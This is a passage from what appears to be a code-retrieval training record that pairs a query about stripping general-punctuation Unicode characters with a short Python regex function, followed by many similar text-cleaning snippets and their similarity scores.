lowercase text\n text = REPLACE_BY_SPACE_RE.sub ( ' ' , text ) # replace REPLACE_BY_SPACE_RE symbols by space in text\n text = BAD_SYMBOLS_RE.sub ( '' , text ) # delete symbols which are in BAD_SYMBOLS_RE from text\n text = ' '.join ( word for word in text.split ( ) if word not in STOPWORDS ) # delete stopwors from text\n return text", "def clean_text ( self, text ) :\n text = BeautifulSoup ( text , \"lxml\" ).text # HTML decoding\n text = text.lower ( ) # lowercase text\n text = REPLACE_BY_SPACE_RE.sub ( ' ' , text ) # replace REPLACE_BY_SPACE_RE symbols by space in text\n text = BAD_SYMBOLS_RE.sub ( '' , text ) # delete 
symbols which are in BAD_SYMBOLS_RE from text\n text = ' '.join ( word for word in text.split ( ) if word not in STOPWORDS ) # delete stopwors from text\n return text", "def _hidden_in_unicode(self, txt):", "def fix_text(text):\n ''.join((c for c in unicodedata.normalize('NFD', text) if unicodedata.category(c) != 'Mn'))\n text = text.replace('\\n', '')\n text = text.upper()\n\n return text.strip()", "def remove_emojis(text):\n # http://stackoverflow.com/a/13752628/6762004\n RE_EMOJI = re.compile('[\\U00010000-\\U0010ffff]', flags=re.UNICODE)\n return RE_EMOJI.sub(r'', text)", "def remove_non_ascii(words):\n #Revisar esta funcion porque no filtra nada...\n new_words = []\n for word in words:\n new_word = unicodedata.normalize('NFKD', word).encode('ascii', 'ignore').decode('utf-8', 'ignore')\n new_words.append(new_word)\n return new_words", "def actionClear(self):\n self.setText(\"\")", "def clean_text(text_list):\n remove_char = u'!\"#%\\'()*+,-./:;<=>?@[\\]^_`{|}~$1234567890'\n translate_table = dict((ord(char), None) for char in remove_char)\n translate_table[ord(u'\\n')] = ord(' ')\n for i in range(0, len(text_list)):\n text_list[i] = (xstr(text_list[i])).lower().translate(translate_table)\n return text_list", "def clearOld(self):\n self.monitorTextBox.setPlainText(\"\")", "def remove_non_ascii(self, words):\n\t\tnew_words = []\n\t\tfor word in words:\n\t\t\tnew_word = unicodedata.normalize('NFKD', word).encode('ascii', 'ignore').decode('utf-8', 'ignore')\n\t\t\tnew_words.append(new_word)\n\t\treturn new_words", "def force_ascii(text):\n return \"\".join([c for c in text if ord(c) < 128])", "def remove_emoji(text):\n return emoji.get_emoji_regexp().sub(u'', text)", "def clear_result(self):\n\n self.ui.plainTextEdit.clear()", "def remove(text, *args):\n\n chars = \"\".join(args)\n for char in chars:\n text = text.replace(char, \"\")\n\n return text", "def clear():", "def Clear(self) -> None:", "def clean_text_from_nonbasic_characters(text):\n text = re.sub(r\"([^\\u0000-\\u007F])\", \" \", text)\n text = replace_newline_with_space(text).strip()\n text = text.replace(\"_\", \"\")\n text = clean_text_from_multiple_consecutive_whitespaces(text)\n return text", "def clean_text_from_nonbasic_characters(text):\n text = re.sub(r\"([^\\u0000-\\u007F])\", \" \", text)\n text = replace_newline_with_space(text).strip()\n text = text.replace(\"_\", \"\")\n text = clean_text_from_multiple_consecutive_whitespaces(text)\n return text", "def onclick_rxclear(self, event): # wxGlade: TerminalFrame.<event_handler>\n self.rx_text.Clear()", "def clear_punctuation(document):\n return re.sub(r'\\D', '', str(document))", "def remove_emoji_punc(text):\n \n allchars = [str for str in text]\n emoji_list = [c for c in allchars if c in emoji.UNICODE_EMOJI]\n clean_text = ' '.join([str for str in text.split() if not any(i in str for i in emoji_list)])\n\n \n s1 = clean_text.replace(u'’', u\"\").replace(\"'\",\"\")\n s1 = re.sub(r'[^a-z0-9 ]+', ' ', s1)\n \n return \" \".join(s1.split())", "def clear(self):", "def clear(self):", "def clear(self):", "def clear(self):", "def clear(self):", "def clear(self):", "def clear(self):", "def remove_non_ascii(words):\r\n new_words = []\r\n for word in words:\r\n new_word = unicodedata.normalize('NFKD', word).encode('ascii', 'ignore').decode('utf-8', 'ignore')\r\n new_words.append(new_word)\r\n return new_words", "def clean_text(data):\r\n data = data.replace('\\n', ' ') #remove new lines\r\n replace_l = [\"'\",'!','/','\\\\','=',',',':', 
'<','>','?','.','\"',')','(','|','-','#','*','+', '_'] #list of characters to remove\r\n data = data.lower() #Convert all the words to lower case\r\n for i in replace_l:\r\n data = data.replace(i,' ') #replace words with blank character\r\n return data #return clean data\r", "def strip_accents(text):\n text = six.ensure_text(text)\n text = unicodedata.normalize('NFD', text)\n text = text.encode('ascii', 'ignore')\n return str(text)", "def _clean(self, texts, no_punc=False):\n result = ''\n sw = self._sw_no_punc_dict if no_punc else self._sw_dict\n for t in texts:\n if t not in sw:\n result += t\n return result", "def clean_non_chinese_symbols(text):\n text = regex.sub('[!!]+', \"!\", text)\n text = regex.sub('[??]+', \"?\", text)\n text = regex.sub(\"[a-zA-Z#$%&\\'()*+,-./:;:<=>@,。★、…【】《》“”‘’[\\\\]^_`{|}~]+\", \" UNK \", text)\n return regex.sub(\"\\s+\", \" \", text)", "def removeThreeByteUtf(html):\n entRe = re.compile('&#x[0-9ABCDEabcde]{5,9}')\n return entRe.sub('<WideUnicodeChar>', html)", "def _remove_non_ascii(words):\n new_words = []\n for word in words:\n new_word = unicodedata.normalize('NFKD', word).encode('ascii', 'ignore').decode('utf-8', 'ignore')\n new_words.append(new_word)\n return new_words", "def clean_text_from_private_unicode(line):\n line = re.sub(r\"([\\uE000-\\uF8FF]|\\uD83C[\\uDF00-\\uDFFF]|\\uD83D[\\uDC00-\\uDDFF])\", \" \", line)\n return line", "def clean_text_from_private_unicode(line):\n line = re.sub(r\"([\\uE000-\\uF8FF]|\\uD83C[\\uDF00-\\uDFFF]|\\uD83D[\\uDC00-\\uDDFF])\", \" \", line)\n return line", "def reset(self):\n self.descripcionString.set(\"\")\n self.tituloString.set(\"\")", "def _strip_text(text):\n text = re.sub(r'[ ,?:]|%s', \"\", text.lower())\n for chr in \"-%\":\n new_text = text.replace(chr, \"\")\n if new_text:\n text = new_text\n return text.lower()", "def remove_non_ascii(words):\n new_words = []\n for word in words:\n new_word = unicodedata.normalize('NFKD', word).encode('ascii', 'ignore').decode('utf-8', 'ignore')\n new_words.append(new_word)\n return new_words", "def remove_non_ascii(words):\n new_words = []\n for word in words:\n new_word = unicodedata.normalize('NFKD', word).encode('ascii', 'ignore').decode('utf-8', 'ignore')\n new_words.append(new_word)\n return new_words", "def remove_non_ascii(words):\n new_words = []\n for word in words:\n new_word = unicodedata.normalize('NFKD', word).encode('ascii', 'ignore').decode('utf-8', 'ignore')\n new_words.append(new_word)\n return new_words", "def remove_non_ascii(words):\n new_words = []\n for word in words:\n new_word = unicodedata.normalize('NFKD', word).encode('ascii', 'ignore').decode('utf-8', 'ignore')\n new_words.append(new_word)\n return new_words", "def remove_non_ascii(words):\n new_words = []\n for word in words:\n new_word = unicodedata.normalize('NFKD', word).encode('ascii', 'ignore').decode('utf-8', 'ignore')\n new_words.append(new_word)\n return new_words", "def remove_non_ascii(words):\n new_words = []\n for word in words:\n new_word = unicodedata.normalize('NFKD', word).encode('ascii', 'ignore').decode('utf-8', 'ignore')\n new_words.append(new_word)\n return new_words", "def _remove_special_chars(self, text: str) -> str:\n pattern = re.compile(self.special_chars_pattern)\n text = re.sub(pattern, \" \", text)\n return text" ]
[ "0.69256425", "0.6896335", "0.68667537", "0.67069024", "0.66337216", "0.65545833", "0.6554385", "0.6529281", "0.6484313", "0.6460039", "0.6445077", "0.64252377", "0.64120406", "0.6407746", "0.6383768", "0.6383287", "0.6367802", "0.6363216", "0.6355911", "0.631609", "0.63075715", "0.62900394", "0.6281164", "0.62550473", "0.62434953", "0.6241916", "0.6241916", "0.6238193", "0.6200551", "0.6197106", "0.61609584", "0.6143517", "0.6128857", "0.6124016", "0.61118704", "0.61080265", "0.6065436", "0.6041815", "0.60270816", "0.60164154", "0.6015353", "0.60034245", "0.60011697", "0.5995145", "0.59827405", "0.59746754", "0.5973762", "0.59546465", "0.5950779", "0.59427124", "0.59427124", "0.59427124", "0.59427124", "0.59427124", "0.59427124", "0.5912458", "0.5911024", "0.5885367", "0.588064", "0.5879735", "0.58543557", "0.5839575", "0.5835184", "0.583113", "0.58285576", "0.5822574", "0.5820032", "0.58182806", "0.5806365", "0.5806045", "0.5806045", "0.5806044", "0.5799253", "0.57956296", "0.57947785", "0.57947785", "0.57947785", "0.57947785", "0.57947785", "0.57947785", "0.57947785", "0.5784573", "0.57839906", "0.57743686", "0.57709855", "0.5767211", "0.57669765", "0.5763891", "0.5761179", "0.5761179", "0.5751517", "0.5742191", "0.5739424", "0.5739424", "0.5739424", "0.5739424", "0.5739424", "0.5739424", "0.5737425" ]
0.6754026
4
Clears the text from general punctuation unicodes
def clean_text_from_general_punctuation_unicode(text): return re.sub(r"([\u2000-\u206F])", " ", text)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def remove_punct(self,text):", "def clear_punctuation(document):\n return re.sub(r'\\D', '', str(document))", "def remove_punctuation(self, text):\n punct = string.punctuation\n trantab = str.maketrans(punct, len(punct) * ' ')\n return text.translate(trantab)", "def remove_punctuations(self, text):\n translator = str.maketrans('', '', self._punctuations_list)\n return text.translate(translator)", "def remove_punctations_fun(self): \n self.doc = re.sub('[^a-zA-Z0-9]', ' ', self.doc)", "def remove_punct(text):\r\n table = str.maketrans('', '', string.punctuation)\r\n return text.translate(table)", "def remove_punctuation(text: str) -> str:\n return \"\".join(\n itertools.filterfalse(lambda x: unicodedata.category(x).startswith(\"P\"), text)\n )", "def remove_punctuations(text):\n return text.translate(str.maketrans('', '', string.punctuation))", "def punct_remove(text):\n return(re.sub(punct_characters,' ',text))", "def remove_punctuation(text):\n return re.sub('[,.?\";:\\-!@#$%^&*()]', '', text)", "def remove_punctuation(text):\n return text.translate(None, string.punctuation)", "def remove_punctuation(text):\n s =[]\n for char in text:\n if char in punc:\n s.append(\" \")\n else:\n s.append(char) \n return \"\".join(s)", "def _clean(self, text):\n if len(self.alph) == 26:\n text = sub('[\\n\\t ' + string.punctuation + ']+?', '', text)\n else:\n text = sub('[\\n\\t]+?', '', text)\n\n text = text.lower()\n text = text.encode('ascii', 'ignore').decode()\n return text", "def stripPunctuation(text):\n exclude = set(string.punctuation)\n clean_text = ''.join(ch for ch in text if ch not in exclude)\n clean_text = clean_text.replace('\\n',' ') # Let's account for newline characters also \n return clean_text.encode('ascii','ignore')", "def remove_punctuation(text):\n bad_characters = [\".\", \",\", \";\", \"!\", \"?\", \":\", \"(\", \")\", \"-\", \"/\", \"*\",\n \"' \", \" '\", '\"', \"&\"]\n for bad_character in bad_characters:\n text = text.replace(bad_character, \"\")\n return text.lower()", "def remove_punc(text):\n for punctuation in string.punctuation:\n text = text.replace(punctuation, ' ')\n text = re.sub(\" +\", \" \", text)\n return text", "def removeOwnPunctuation(self):\n\t\tself.textFile = self.removePunctuation(self.open(self.filePath)).split()", "def remove_punctuation(text):\n import string\n PUNCT_TO_REMOVE = '''!()-[]{};:'\"\\,<>/?@#$%^&*_~'''\n no_punct = \"\"\n for char in text:\n if char not in PUNCT_TO_REMOVE:\n no_punct = no_punct + char\n else:\n no_punct = no_punct + ' '\n return(no_punct)", "def remove_puncts(text):\n # regex rocks\n #return re.sub('[%s]'%PUNCTS, ' ', text)\n return REMOVE_PUNCTS_RE.sub(' ', text)", "def removePunctuation(text):\n return re.sub(r'[^A-Za-z0-9 ]', ' ', text).strip()", "def remove_punctuation(self):\n new_words = []\n # new_words = \"\"\n for word in self.words:\n new_word = re.sub(r'[^\\w\\s]', '', word)\n if new_word != '':\n new_words.append(new_word)\n # new_words += f\"{new_word} \"\n self.words = new_words\n return self", "def remove_punct(sample):\n sample[\"full_text\"] = \"\".join([char for char in sample[\"full_text\"] if char not in punct_dic])\n return sample", "def _remove_punctuation(text: str) -> str:\n punctuation = string.punctuation + '¿¡'\n table = str.maketrans('', '', punctuation)\n words = text.split()\n\n stripped = [word.translate(table) for word in words]\n\n return ' '.join(stripped)", "def remove_punctuation(text):\n text = re.sub('[%s]' % re.escape(string.punctuation), '', text)\n return text", "def 
CLEAN(text):\n return _control_char_re.sub('', text)", "def remove_punctuation(text):\n text = re.sub(r'[^\\w\\s]', ' ', text)\n return text", "def removePunctuation(self, text=None):\n\t\t# Loop through all the punctuation in self.stop_puncs\n\t\tfor punctuation in self.stop_puncs:\n\n\t\t\t# Replace punctuation with leading and trailing spaces\n\t\t\ttext = text.replace(\" \" + punctuation, \" \")\n\t\t\ttext = text.replace(punctuation + \" \", \" \")\n\n\t\t\t# Replace punctuation within the first and last 5 characters of the text\n\t\t\ttext = text[:5].replace(punctuation, \"\") + text[5:]\n\t\t\ttext = text[:-5] + text[-5:].replace(punctuation, \"\")\n\n\t\t\t# Otherwise, remove the punctuation if not in list specified\n\t\t\tif punctuation not in [\".\", \",\", \"-\", \"--\"]:\n\t\t\t\ttext = text.replace(punctuation, \"\")\n\n\t\treturn text", "def test_drop_punctuation():\n assert TextCleaner().transform([[\"'test!?\"]])[\"corpus\"][0] == \"test\"", "def _clean_text(self, text):\n output = []\n for char in text:\n cp = ord(char)\n if cp == 0 or cp == 0xfffd or _is_control(char):\n continue\n if _is_whitespace(char):\n output.append(\" \")\n else:\n output.append(char)\n return \"\".join(output)", "def remove_punctuation(text):\n return re.sub(r'[^\\w]', ' ', text)", "def strip(self, str_text):\n punct_chars = [' ', '.', ',', '!', '?', '&', '\"', \"'\", '-', ':']\n str_text = [i for i in str_text if i not in punct_chars]\n str_text = ''.join(str_text)\n return str_text", "def _clean_text(self, text):\n output = []\n for char in text:\n cp = ord(char)\n if cp == 0 or cp == 65533 or _is_control(char):\n continue\n if _is_whitespace(char):\n output.append(' ')\n else:\n output.append(char)\n return ''.join(output)", "def remove_unicode(text):\n regex = r\"(\\\\u....)\"\n text = re.sub(regex, ' ', text)\n return text", "def _text_remove_s(all_text):\n\t# on n'agit que s'il y a au moins un cara plein\n\t\t# => pas les elts vides, ni \\s dont saut de ligne\n\tif len(all_text) and search('[^\\s]', all_text, flags=MULTILINE):\n\t\tflat_alltext = sub(r'\\n', '¤', all_text, flags=MULTILINE)\n\t\tflat_alltext = sub(r'[¤\\s]+$', '', flat_alltext)\n\t\tflat_alltext = sub(r'^[¤\\s]+', '', flat_alltext)\n\telse:\n\t\tflat_alltext = ''\n\treturn flat_alltext", "def _clean_text(self, text):\n output = []\n for char in text:\n cp = ord(char)\n if cp == 0 or cp == 0xFFFD or _is_control(char):\n continue # pragma: no cover\n if _is_whitespace(char):\n output.append(\" \")\n else:\n output.append(char)\n return \"\".join(output)", "def removePunctuation(self,phrase):\n if(\"normalizeText\" in self._classes):\n return self._normalize.removePunctuation(phrase)", "def remove_punctuation(label):\n\n word = \"\".join(c for c in word if c not in ('!','.',':',',','.','?','\\''))\n return word", "def _do_smart_punctuation(self, text):\r\n if \"'\" in text: # guard for perf\r\n text = self._do_smart_contractions(text)\r\n text = self._opening_single_quote_re.sub(\"&#8216;\", text)\r\n text = self._closing_single_quote_re.sub(\"&#8217;\", text)\r\n\r\n if '\"' in text: # guard for perf\r\n text = self._opening_double_quote_re.sub(\"&#8220;\", text)\r\n text = self._closing_double_quote_re.sub(\"&#8221;\", text)\r\n\r\n text = text.replace(\"---\", \"&#8212;\")\r\n text = text.replace(\"--\", \"&#8211;\")\r\n text = text.replace(\"...\", \"&#8230;\")\r\n text = text.replace(\" . . . \", \"&#8230;\")\r\n text = text.replace(\". . 
.\", \"&#8230;\")\r\n return text", "def remove_tokens(self, text):\r\n\r\n return text.replace(self.PAD_TK, \"\").replace(self.UNK_TK, \"\")", "def remove_special_chars(text):\n schars = ''.join([a for a in string.punctuation if a not in \".,?\"])\n\n text = re.sub('[%s]' % re.escape(schars), '', text)\n return text", "def stripPunctuation(data):\n for punctuation in punctuations:\n data = data.replace(punctuation, \" \")\n return data", "def replace_punctuation(raw):\r\n\tpunct = set(string.punctuation)\r\n\t\r\n\treturn ''.join([r for r in raw if r not in punct])", "def clean_text(self, text):\n return \"\".join((self.SP_CHAR_MAPPING.get(c, c) for c in text))", "def remove_emoji_punc(text):\n \n allchars = [str for str in text]\n emoji_list = [c for c in allchars if c in emoji.UNICODE_EMOJI]\n clean_text = ' '.join([str for str in text.split() if not any(i in str for i in emoji_list)])\n\n \n s1 = clean_text.replace(u'’', u\"\").replace(\"'\",\"\")\n s1 = re.sub(r'[^a-z0-9 ]+', ' ', s1)\n \n return \" \".join(s1.split())", "def removePunc(text):\r\n\t\r\n\tlistFromText = []\r\n\r\n\tfor word in text.split():\r\n\t\tword = word.strip(string.punctuation) # menghapus tanda baca dalam teks\r\n\t\tlistFromText.append(word)\r\n\r\n\treturn listFromText", "def cleanString(self, s):\r\n s = s.lower()\r\n for x in s: \r\n if x in punctuation:\r\n s = s.replace(x, '')\r\n return s", "def clean_up_text(text):\n text = html.unescape(text)\n return remove_emoji(text)", "def clean_text(text):\n output = []\n for char in text:\n cp = ord(char)\n if cp == 0 or cp == 0xfffd or is_control(char):\n continue\n if is_whitespace(char):\n output.append(\" \")\n else:\n output.append(char)\n return \"\".join(output)", "def remove_noise(text):\n text1 = re.sub(\"[\\t\\r\\s]\", \" \",text)\n text1 = \" \" + text1\n text2 = re.sub(r\"([ \" + string.punctuation + \"]+)[^a-zA-Z ]+\", \"\\g<1> \", text1)\n return text2", "def removeUnicode(text):\n text = re.sub(r'(\\\\u[0-9A-Fa-f]+)',r'', text) \n text = re.sub(r'[^\\x00-\\x7f]',r'',text)\n return text", "def remove_punctuation(text):\n words = text.split()\n table = str.maketrans(\"\", \"\", string.punctuation)\n return ' '.join([w.translate(table) for w in words])", "def clean_text(text):\n lowercase = tf.strings.lower(text)\n stripped_html = tf.strings.regex_replace(lowercase, \"<br />\", \" \")\n cleaned_punctuation = tf.strings.regex_replace(\n stripped_html, \"[%s]\" % re.escape(string.punctuation), \"\"\n )\n return cleaned_punctuation", "def remove_diacritics(self, text):\n text = re.sub(self._arabic_diacritics, '', text)\n return text", "def remove_punc_alternative(self, sentence):\n regex = re.compile('[%s]' % re.escape(string.punctuation))\n return regex.sub('', sentence)", "def removeSpecialChars(self) -> None:\n self.text = re.sub('[^a-zA-z0-9\\n\\.\\s]', '', self.text)", "def remove_non_alphabetic_text(text):\n return RegexFilters.replace_non_alphabetic_text(text, \"\")", "def desc_cleanser(self, txt):\n # New line issues\n txt = re.sub(r'\\\\n', r' ', txt)\n # Unicode cleanse\n txt = re.sub(r'\\\\u[\\d]{4}', r'', txt)\n # Remaining unicode cleanse\n txt = re.sub(r'\\\\{1,2}\\S+', r' ', txt)\n # Remove remaining non-alphanumeric and spaces\n txt = ''.join([i for i in txt if i.isalnum() or i.isspace() or i in ['.','?','!']])\n # Remove more than a single space\n txt = re.sub(r'\\s+', r' ', txt)\n\n return txt", "def clear(self):\n self.sentence.clear()", "def spacing_punctuation(text):\n for punc in all_punct:\n if punc in text:\n text = 
text.replace(punc, f' {punc} ')\n return text", "def spacing_punctuation(text):\n for punc in all_punct:\n if punc in text:\n text = text.replace(punc, f' {punc} ')\n return text", "def remove_inner_word_characters(text):\n return RegexFilters.replace_inner_word_characters(text, \"\")", "def remove_diacritics(self, text, onehot_label):\n idx = np.random.randint(0, len(onehot_label))\n prevent_loop = 0\n while onehot_label[idx] == 1 or text[idx] == unidecode.unidecode(text[idx]) or text[idx] in string.punctuation:\n idx = np.random.randint(0, len(onehot_label))\n prevent_loop += 1\n if prevent_loop > 10:\n return False, text, onehot_label\n\n onehot_label[idx] = 1\n text[idx] = unidecode.unidecode(text[idx])\n return True, text, onehot_label", "def remove_unicode_diac(text):\n # Replace diacritics with nothing\n text = text.replace(u\"\\u064B\", \"\") # fatHatayn\n text = text.replace(u\"\\u064C\", \"\") # Dammatayn\n text = text.replace(u\"\\u064D\", \"\") # kasratayn\n text = text.replace(u\"\\u064E\", \"\") # fatHa\n text = text.replace(u\"\\u064F\", \"\") # Damma\n text = text.replace(u\"\\u0650\", \"\") # kasra\n text = text.replace(u\"\\u0651\", \"\") # shaddah\n text = text.replace(u\"\\u0652\", \"\") # sukuun\n text = text.replace(u\"\\u0670\", \"`\") # dagger 'alif\n return text", "def removeNonAsciiFromText(self, text):\n\t\treturn ''.join([i if ord(i) < 128 else '' for i in text])", "def remove_punctuation(sample):\n punctuations = '''!\"&'()*+,-./:;<=>?[\\]^`{|}~'''\n no_punct = \"\"\n for char in sample:\n if char not in punctuations:\n no_punct = no_punct + char\n return no_punct", "def normalize_punctuation(text):\n text = str(text)\n text = text.translate(punct_trans_table)\n return normalize_whitespace(text)", "def clean_text_from_nonbasic_characters(text):\n text = re.sub(r\"([^\\u0000-\\u007F])\", \" \", text)\n text = replace_newline_with_space(text).strip()\n text = text.replace(\"_\", \"\")\n text = clean_text_from_multiple_consecutive_whitespaces(text)\n return text", "def clean_text_from_nonbasic_characters(text):\n text = re.sub(r\"([^\\u0000-\\u007F])\", \" \", text)\n text = replace_newline_with_space(text).strip()\n text = text.replace(\"_\", \"\")\n text = clean_text_from_multiple_consecutive_whitespaces(text)\n return text", "def clean_text ( self, text ) :\n text = BeautifulSoup ( text , \"lxml\" ).text # HTML decoding\n text = text.lower ( ) # lowercase text\n text = REPLACE_BY_SPACE_RE.sub ( ' ' , text ) # replace REPLACE_BY_SPACE_RE symbols by space in text\n text = BAD_SYMBOLS_RE.sub ( '' , text ) # delete symbols which are in BAD_SYMBOLS_RE from text\n text = ' '.join ( word for word in text.split ( ) if word not in STOPWORDS ) # delete stopwors from text\n return text", "def clean_text ( self, text ) :\n text = BeautifulSoup ( text , \"lxml\" ).text # HTML decoding\n text = text.lower ( ) # lowercase text\n text = REPLACE_BY_SPACE_RE.sub ( ' ' , text ) # replace REPLACE_BY_SPACE_RE symbols by space in text\n text = BAD_SYMBOLS_RE.sub ( '' , text ) # delete symbols which are in BAD_SYMBOLS_RE from text\n text = ' '.join ( word for word in text.split ( ) if word not in STOPWORDS ) # delete stopwors from text\n return text", "def clean_text ( self, text ) :\n text = BeautifulSoup ( text , \"lxml\" ).text # HTML decoding\n text = text.lower ( ) # lowercase text\n text = REPLACE_BY_SPACE_RE.sub ( ' ' , text ) # replace REPLACE_BY_SPACE_RE symbols by space in text\n text = BAD_SYMBOLS_RE.sub ( '' , text ) # delete symbols which are in BAD_SYMBOLS_RE from 
text\n text = ' '.join ( word for word in text.split ( ) if word not in STOPWORDS ) # delete stopwors from text\n return text", "def clean_text ( self, text ) :\n text = BeautifulSoup ( text , \"lxml\" ).text # HTML decoding\n text = text.lower ( ) # lowercase text\n text = REPLACE_BY_SPACE_RE.sub ( ' ' , text ) # replace REPLACE_BY_SPACE_RE symbols by space in text\n text = BAD_SYMBOLS_RE.sub ( '' , text ) # delete symbols which are in BAD_SYMBOLS_RE from text\n text = ' '.join ( word for word in text.split ( ) if word not in STOPWORDS ) # delete stopwors from text\n return text", "def clean_text ( self, text ) :\n text = BeautifulSoup ( text , \"lxml\" ).text # HTML decoding\n text = text.lower ( ) # lowercase text\n text = REPLACE_BY_SPACE_RE.sub ( ' ' , text ) # replace REPLACE_BY_SPACE_RE symbols by space in text\n text = BAD_SYMBOLS_RE.sub ( '' , text ) # delete symbols which are in BAD_SYMBOLS_RE from text\n text = ' '.join ( word for word in text.split ( ) if word not in STOPWORDS ) # delete stopwors from text\n return text", "def clean_text ( self, text ) :\n text = BeautifulSoup ( text , \"lxml\" ).text # HTML decoding\n text = text.lower ( ) # lowercase text\n text = REPLACE_BY_SPACE_RE.sub ( ' ' , text ) # replace REPLACE_BY_SPACE_RE symbols by space in text\n text = BAD_SYMBOLS_RE.sub ( '' , text ) # delete symbols which are in BAD_SYMBOLS_RE from text\n text = ' '.join ( word for word in text.split ( ) if word not in STOPWORDS ) # delete stopwors from text\n return text", "def stripPunctuation(stri):\n for char in string.punctuation:\n stri = re.sub(r'[\\W]+', ' ', stri) \n\n return stri", "def _remove_asian_punct(cls, sentence: str) ->str:\n sentence = re.sub(cls._ASIAN_PUNCTUATION, '', sentence)\n sentence = re.sub(cls._FULL_WIDTH_PUNCTUATION, '', sentence)\n return sentence", "def removePunctuation(self, words):\n\t\treturn self.__punctuationRegex.sub(' ', words)", "def _remove_custom_chars(self, text: str) -> str:\n patterns = \"|\".join([x for x in self.custom_chars])\n return re.sub(patterns, \"\", str(text), flags=re.IGNORECASE)", "def _clean_up(hadith_text: str) -> str:\n punctuations = ''.join([\n # Collected from https://en.wikipedia.org/wiki/Arabic_script_in_Unicode#Punctuation_and_ornaments\n chr(int('060C', 16)), # ARABIC COMMA\n chr(int('060D', 16)), # ARABIC DATE SEPARATOR\n chr(int('060E', 16)), # ARABIC POETIC VERSE SIGN\n chr(int('060F', 16)), # ARABIC SIGN MISRA\n chr(int('061B', 16)), # ARABIC SEMICOLON\n chr(int('061E', 16)), # ARABIC TRIPLE DOT PUNCTUATION MARK\n chr(int('061F', 16)), # ARABIC QUESTION MARK\n chr(int('066D', 16)), # ARABIC FIVE POINTED STAR\n chr(int('06D4', 16)), # ARABIC FULL STOP\n chr(int('06DD', 16)), # ARABIC END OF AYAH\n chr(int('06DE', 16)), # ARABIC START OF RUB EL HIZB\n chr(int('06E9', 16)), # ARABIC PLACE OF SAJDAH\n chr(int('06FD', 16)), # ARABIC SIGN SINDHI AMPERSAND\n chr(int('FD3E', 16)), # Arabic ornate left parenthesis\n chr(int('FD3F', 16)), # Arabic ornate right parenthesis\n ])\n\n # Removing punctuations\n cleaned_text = re.sub('[' + punctuations + ']', ' ', hadith_text)\n\n # Removing any html markup\n cleaned_text = BeautifulSoup(cleaned_text, 'lxml').text\n\n # Removing multiple consecutive whitespaces, including newlines\n cleaned_text = ' '.join(cleaned_text.split())\n\n return cleaned_text", "def verbalisePunctuation(self):\n for i, strText in enumerate(self.sentencesList):\n #For all punctuation marks\n for regex, value in list(TextRepresentation.PUNCTUATION.items()):\n strText = re.sub(regex, value, 
strText)\n self.sentencesList[i] = strText", "def remove_punctuation(string):\n return NON_ALNUM.sub(\"\", string)", "def clear_text(self):\n global empty_string\n \n for r in range(1,3):\n for c in range(6):\n self.create_text_under_photo(data = empty_string,r=r,c=c)", "def clear_text(self):\n global empty_string\n \n for r in range(1,3):\n for c in range(6):\n self.create_text_under_photo(data = empty_string,r=r,c=c)", "def clean_text(data):\r\n data = data.replace('\\n', ' ') #remove new lines\r\n replace_l = [\"'\",'!','/','\\\\','=',',',':', '<','>','?','.','\"',')','(','|','-','#','*','+', '_'] #list of characters to remove\r\n data = data.lower() #Convert all the words to lower case\r\n for i in replace_l:\r\n data = data.replace(i,' ') #replace words with blank character\r\n return data #return clean data\r", "def clean_text(txt):\n\n cleaned_txt = ''\n for character in txt:\n if character not in 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVQXWY ': #punctuation\n character = ''\n cleaned_txt += character\n elif character == character.upper(): #uppercase\n character = character.lower()\n cleaned_txt += character\n else:\n cleaned_txt += character\n return cleaned_txt", "def clean_text(text):\n global cleaned_text\n # remove numbers\n text_nonum = re.sub(r'\\d+', '', text)\n # remove punctuations and convert characters to lower case\n text_nopunct = \"\".join([char.lower() for char in text_nonum if char not in string.punctuation]) \n # substitute multiple whitespace with single whitespace\n # Also, removes leading and trailing whitespaces\n text_no_doublespace = re.sub('\\s+', ' ', text_nopunct).strip()\n #tokenise text\n tokenised_text = text_no_doublespace.split()\n for word in tokenised_text:\n if len(word) == 1:\n tokenised_text.remove(word)\n #if word is a stop word, remove it from the list\n elif word in stopwords.words('english'):\n tokenised_text.remove(word)\n #de-tokenise text\n cleaned_text = ' '.join(tokenised_text)\n return cleaned_text", "def clean_text(text):\n text = str(text).lower()\n text = text.strip(string.punctuation)\n text = re.sub(\"&amp;\", '', text)\n text = re.sub(\"https\", '', text)\n text = re.sub('\\W\\s', '', text)\n text = re.sub('\\s,\\W', '', text)\n text = re.sub('[.!@#$%^&*()_,:;/-]', '', text)\n text = re.sub(\"\\d+\", '', text)\n\n return text", "def clean_non_chinese_symbols(text):\n text = regex.sub('[!!]+', \"!\", text)\n text = regex.sub('[??]+', \"?\", text)\n text = regex.sub(\"[a-zA-Z#$%&\\'()*+,-./:;:<=>@,。★、…【】《》“”‘’[\\\\]^_`{|}~]+\", \" UNK \", text)\n return regex.sub(\"\\s+\", \" \", text)", "def cleanTweetText(tweet):\n twext = excludeTwitterTags(tweet)\n twext = stripPunctuation(twext)\n return twext", "def cleanTweetText(tweet):\n twext = excludeTwitterTags(tweet)\n twext = stripPunctuation(twext)\n return twext", "def remove_punctuation(string_punct):\n return string_punct.translate(str.maketrans('', '', string.punctuation))", "def clear_trash(text):\n for i in TRASH:\n text = text.replace(i, '')\n\n return text", "def remove_punctuation(self, tweet):\n tweet = tweet.replace(\"\\n\", \"\")\n tweet = tweet.replace(\"\\t\", \"\")\n re.sub(r\"http\\S+\", \"\", tweet) # removes links\n\n translator = str.maketrans(\"\", \"\", string.punctuation)\n return tweet.lower().translate(translator)", "def punctuation(self, value):\n value = re.sub('_', ' ', value)\n value = re.sub(',', ' ', value)\n value = re.sub('\\'', ' ', value)\n value = re.sub(r'[^\\w\\s]','', value)\n value = re.sub(r'\\s+',' ',value)\n return value", "def 
